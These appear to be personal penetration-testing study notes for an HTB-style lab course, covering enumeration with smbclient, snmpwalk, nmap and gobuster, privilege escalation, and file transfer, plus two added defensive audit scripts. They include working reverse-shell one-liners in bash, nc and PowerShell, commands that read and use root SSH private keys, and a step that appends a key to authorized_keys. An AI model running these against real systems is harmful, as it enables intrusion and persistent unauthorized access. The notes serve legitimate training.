2. Getting Started

Risk Management

Protecting data in line with policy without negatively affecting the org

  1. Identify: Legal, environmental, market, regulatory, etc...

  2. Analyze: Determines impact, probability. Mapped to policies, procedures, processes

  3. Evaluate: Org decides to accept unavoidable, avoid (change plans), control (mitigate) or transfer risk (insure)

  4. Deal: Eliminate risk where possible, interfacing with stakeholders

  5. Monitor: Watch for situational changes that could shift impact between low, medium and high

Handy Cmds:

netstat -rn # show accessible networks w/vpn

Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         192.168.1.2     0.0.0.0         UG        0 0          0 eth0
10.10.14.0      0.0.0.0         255.255.254.0   U         0 0          0 tun0
10.129.0.0      10.10.14.1      255.255.0.0     UG        0 0          0 tun0
192.168.1.0     0.0.0.0         255.255.255.0   U         0 0          0 eth0

Services

Server Message Block:

  • SMB allows users, admins to share folders, make them accessible

  • A tool that can enumerate SMB shares is smbclient

  • -L Retrieve list of avail shares on remote host

  • -N Suppress passwd

  • get file.txt Download a file

#smbclient
smbclient -N -L \\\\10.10.10.0 # list SMB shares
smbclient \\\\10.10.10.0\\users # connect to SMB share
smbclient --no-pass -L //10.10.10.1 # null user
smbclient -U 'user[%passwd]' -L [--pw-nt-hash] //10.10.10.1 # auth as user; --pw-nt-hash treats passwd as an NT hash
smbclient -U '%' -N \\\\10.10.10.1\\<SHARE> # null session to share

#snmpwalk
snmpwalk -v 2c -c public 10.10.10.1 1.3.6.1.2.1.1.5.0 # walk snmp on ip, starting at the sysName OID
snmpget -V # version of the local net-snmp tools

#handy OIDs to know
1.3.6.1.2.1.1.1.0 # system description
1.3.6.1.4.1.77.1.2.25 # win usrs
1.3.6.1.2.1.25.4.2.1.2 # running procs
1.3.6.1.2.1.2.2.1.2 # int name
1.3.6.1.2.1.6.13.1.3 # open tcp ports
1.3.6.1.2.1.25.6.3.1.2 # software
1.3.6.1.2.1.25.2.3.1.4 # storage units
1.3.6.1.2.1.4.35 # nat table
1.3.6.1.2.1.4.21 # ip route table
1.3.6.1.2.1.31.1.1.1 # wireless table

#other 
onesixtyone -c brute.txt 10.10.10.1 # brute force snmp community strings from a wordlist
enum4linux -a 10.10.10.1 # enum4linux scan, -a runs all enumeration checks

Tmux primer by ippsec

Vim Primer

Netcat: Win: netcat | Win alt: PowerCat. socat: features nc doesn't have (fwding ports, connecting to serial devices)


#tmux
ctrl +b # default prefix
prefix c # new window
prefix 1 # swap to window 1
prefix + shift + % # split vertically
prefix + shift + " # split horizontally
prefix + -> # swap to right pane

#vim
i # insert mode (from normal mode)
esc # back to normal mode
x # cut char
dw # cut word 
dd # cut line
yw # cp word
yy # cp line
p # paste
:1 # go to line 1
:w # write file 'save'
:q # quit
:q! # quit without saving
:wq # save and quit

nmap


#nmap
nmap -sV -sC -p- 10.10.10.0 # ver (V), script (sC), all ports (-p-)
locate scripts/citrix # find nmap scripts by name
ls /usr/share/nmap/scripts | grep snmp # also lists nmap scripts, filtered by keyword
nmap --script smb-os-discovery.nse -p 445 10.10.10.0 # run nse script 
nmap --script=banner -p 80 10.10.10.1 # banner grab

#example
nmap --script smb-os-discovery.nse -p445 10.10.10.40
Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: CEO-PC
|   NetBIOS computer name: CEO-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-12-27T00:59:46+00:00

#netcat 
nc -nv 10.10.10.1 80 # banner grab: connect to a port and read what the service sends

sudo apt install seclists -y # install seclists

Web Enums

  • ffuf or GoBuster to perform dir enum

  • Additional functionality, such as enum public AWS S3 buckets

For DNS/subdomain enum, add a DNS server such as 1.1.1.1 to /etc/resolv.conf

  • EyeWitness/Aquatone can be used to take screenshots of targets, fingerprint them, and identify default creds

Certificates: SSL/TLS certificates are another potentially valuable source of info if HTTPS is in use

  • Viewing the cert reveals details: programs like testssl.sh and sslscan are great for this

  • Email/company name could be used to conduct a phishing attack if in scope

  • robots.txt: common for sites to contain one:

    • Tells engines/crawlers like Googlebot which resources can/can't be accessed for indexing

    • Can provide location of private files/admin pages

  • Source Code: worth checking the source code of any page

#web enums
gobuster dir -u http://10.10.10.1 -w /usr/share/dirb/wordlists/common.txt #dir scan
gobuster dns -d site.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt # subdomain enum

feroxbuster -x php -u http://10.10.10.1 # dir scan, also trying each word with a .php extension
dirsearch -u http://10.10.10.1

curl 10.10.10.1/robots.txt # check robots.txt
curl -IL https://www.website.com # banner grab

whatweb --no-errors 10.10.10.1 # web server/cert details
ctrl +U # view page source in browser

Virtual Machines

Folder Structure: Have a clear folder structure on the machine to save data

moo@htb[/htb]$ tree Projects/
Projects/
└── Acme Company
    ├── EPT (External Pentest)
    │   ├── evidence
    │   │   ├── credentials
    │   │   ├── data
    │   │   └── screenshots
    │   ├── logs
    │   ├── scans
    │   ├── scope
    │   └── tools

What's a shell?

A program that takes input from the user and passes cmds to the OS to perform tasks

bash descends from the original Unix sh; others like zsh, tcsh, ksh, etc. exist

Shell Types

Reverse shell: initiates a connection back to a listener on our attack box


Public Exploits

sudo apt install exploitdb -y
searchsploit openssh 7.2

Online exploit DBs to search for vulns: Exploit DB, Rapid7 DB, Vuln Lab

Metasploit Framework: Contains built-in exploits of public vulns

  • Recon scripts to enum hosts and compromised targets

  • Verification scripts validate vulnerabilities without exploiting them

  • Meterpreter: connect to shells, run cmds on compromised targets

  • Post-exploit/pivot tools

Reverse Shell Commands

The cmd we exec depends on the OS the compromised host runs and what apps/cmds we can access

  • Payload All The Things: Comprehensive list of revshells we can use

  • Certain cmds are more reliable and can be attempted to get a reverse connection

bash -c 'bash -i >& /dev/tcp/x.x/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

  • Once the cmd loses connection: have to rerun the exploit to regain access


Privilege Escalation

Linux: HackTricks, PayloadsAllTheThings, LinEnum, linuxprivchecker

Win: Seatbelt, JAWS, PEASS || Noisy: will trigger detections

dpkg -l # see what software is installed
dir "C:\Program Files" # see what software is installed on windows
find / -perm -u=s -type f 2>/dev/null # find all SUID binaries (setuid bit set)
sudo -l # check what sudo privs we have

User Privileges

sudo allows a user to exec cmds as a diff user: lets lower-priv users exec specific cmds as root without root access

  • GTFOBins: list of cmds and how they can be exploited through sudo

  • LOLBAS: list of Win binaries that can be leveraged, e.g. for downloading files/exec cmds


Scheduled Tasks

Cron jobs: form of scheduling tasks; specific dirs/files we can utilize to add jobs, given the right perms:

1. /etc/crontab
2. /etc/cron.d
3. /var/spool/cron/crontabs/root

  • If we can write to a script/dir called by a cron job: modify it to send us a shell when the job executes
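Added example, not part of the original notes: a defender-side audit for the cron condition described above. It scans a crontab-style file and reports jobs whose executable is group- or other-writable. The function names (audit_cron_file, first_path_in_cmd) are my own, and it assumes GNU find/stat on Linux.

```shell
#!/bin/sh
# Added example (not from the original notes): audit crontab-style files for
# jobs whose executable is writable by group or others, i.e. the condition
# the "Scheduled Tasks" note describes. Assumes GNU stat/find (Linux).
# Usage: audit_cron_file /etc/crontab; for f in /etc/cron.d/*; do audit_cron_file "$f"; done

# Print the first absolute path in a cron command string, e.g.
# "/opt/backup.sh > /dev/null" -> /opt/backup.sh. Returns 1 if none.
first_path_in_cmd() {
    set -f                                  # no globbing of '*' in the command (called in a subshell)
    for tok in $1; do
        case "$tok" in /*) printf '%s\n' "$tok"; return 0 ;; esac
    done
    return 1
}

# audit_cron_file <file>: one finding per line, nothing printed if the file is clean.
audit_cron_file() {
    cronfile="$1"
    grep -v '^[[:space:]]*#' "$cronfile" | grep -v '^[[:space:]]*$' |
    while read -r m h dom mon dow user cmd; do
        case "$m" in
            *=*) continue ;;                              # PATH=... style assignments are not jobs
            @*)  rest="$h $dom $mon $dow $user $cmd" ;;   # @reboot/@daily: one schedule field
            *)   rest="$user $cmd" ;;                     # five schedule fields (+ user in system crontabs)
        esac
        target=$(first_path_in_cmd "$rest") || continue
        [ -e "$target" ] || continue
        # POSIX octal masks: -perm -020 group-writable, -perm -002 other-writable
        if [ -n "$(find "$target" -maxdepth 0 \( -perm -020 -o -perm -002 \) -print)" ]; then
            printf '%s: %s is writable by group/others (mode %s)\n' \
                "$cronfile" "$target" "$(stat -c %a "$target")"
        fi
    done
}
```

Only jobs whose command starts with an absolute path are checked; relative commands resolved via PATH are skipped.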

Exposed Credentials: common in config files, logs, user history (bash_history on Linux, PSReadLine on Win)

SSH Keys: if we have read access over the .ssh dir of a specific user

  • We might be able to read priv ssh keys in

    • /home/user/.ssh/id_rsa or /root/.ssh/id_rsa and use that to log in

    • If we can read the /root/.ssh/ dir, we can copy the key to our machine and use it with ssh -i

cat /home/user/.ssh/id_rsa # or: cat /root/.ssh/id_rsa
vim id_rsa # paste the key into a local file
chmod 600 id_rsa # make perms more restrictive:
# ssh refuses to use a private key with lax perms
ssh mootarget@10.10.10.10 -i id_rsa

  • If we see write access to a user's .ssh/ dir, we can place our public key in the dir

  • sshd won't accept an authorized_keys file writable by other users, so this only works if we control that user's dir

cat /home/user/.ssh/authorized_keys # keys already trusted for that user
ssh-keygen -f key # create new key pair, -f output file
# 2 files created:
# 1. key (we use this with ssh -i)
# 2. key.pub (we copy this to the remote machine)
# cp key.pub onto the remote machine and add it to /root/.ssh/authorized_keys

echo "ssh-rsa DSJDKLAAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
# echo typically achieves this; all we're doing here is appending it to the file
ssh root@10.10.10.1 -i key
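Added example, not part of the original notes: the two permission rules the SSH notes above depend on (ssh rejecting a lax private key, sshd ignoring a writable authorized_keys), written as an audit you can run over a home dir before someone else does. The function names (check_private_key, check_authorized_keys, mode_of, owner_of) are my own; GNU stat on Linux is assumed.

```shell
#!/bin/sh
# Added example (not from the original notes): reproduce the two permission
# checks the SSH notes above rely on, for auditing a home dir. Assumes GNU
# stat (Linux). 1) ssh refuses a private key readable by group/others;
# 2) sshd with StrictModes (the default) ignores ~/.ssh and authorized_keys
# when they are group/other-writable or not owned by the user (or root).

mode_of()  { stat -c %a "$1"; }           # octal mode, e.g. 600, 644, 700
owner_of() { stat -c %U "$1"; }           # owning user name

# check_private_key <keyfile>: prints OK or the reason; returns 1 on a problem.
check_private_key() {
    key="$1"
    [ -f "$key" ] || { echo "missing: $key"; return 1; }
    m=$(mode_of "$key")
    go=$(printf '%s' "$m" | tail -c 2)    # group and other digits
    if [ "$go" != "00" ]; then
        echo "too open: $key mode $m (ssh wants 0600 or 0400)"; return 1
    fi
    echo "OK: $key mode $m"
}

# check_authorized_keys <user> <home>: emulates StrictModes on the home dir,
# ~/.ssh and ~/.ssh/authorized_keys; prints findings; returns 1 on any problem.
check_authorized_keys() {
    user="$1"; home="$2"; rc=0
    for p in "$home" "$home/.ssh" "$home/.ssh/authorized_keys"; do
        [ -e "$p" ] || { echo "missing: $p"; rc=1; continue; }
        o=$(owner_of "$p")
        if [ "$o" != "$user" ] && [ "$o" != "root" ]; then
            echo "bad owner: $p owned by $o"; rc=1
        fi
        m=$(mode_of "$p")
        g=$(printf '%s' "$m" | tail -c 2 | head -c 1)   # group digit
        w=$(printf '%s' "$m" | tail -c 1)               # other digit
        if [ $((g & 2)) -ne 0 ] || [ $((w & 2)) -ne 0 ]; then   # write bit set
            echo "writable by group/others: $p mode $m"; rc=1
        fi
    done
    [ "$rc" -eq 0 ] && echo "OK: authorized_keys for $user would be honoured by sshd"
    return "$rc"
}
```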

Transferring Files: Python HTTP server on our machine, wget/cURL on the target to download files

cd /tmp # go into tmp
python3 -m http.server 8000 # start simple server

wget http://10.10.14.1:8000/linenum.sh # download; path is relative to the dir the server was started in
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh # -o output file name
scp linenum.sh user@remotehost:/tmp/linenum.sh
# scp: specify the local file, then the remote path to save it to

Base64: base64-encode the file, paste the string on the remote server, decode it there

base64 -w 0 shell # transfer a binary file 'shell': b64 encode it on one line
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU

echo f0VMRgA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU | base64 -d > shell
# copy the b64 str, go to the remote host: base64 -d to decode and pipe to a file

file shell # validate file format
md5sum shell # check md5sums of both files
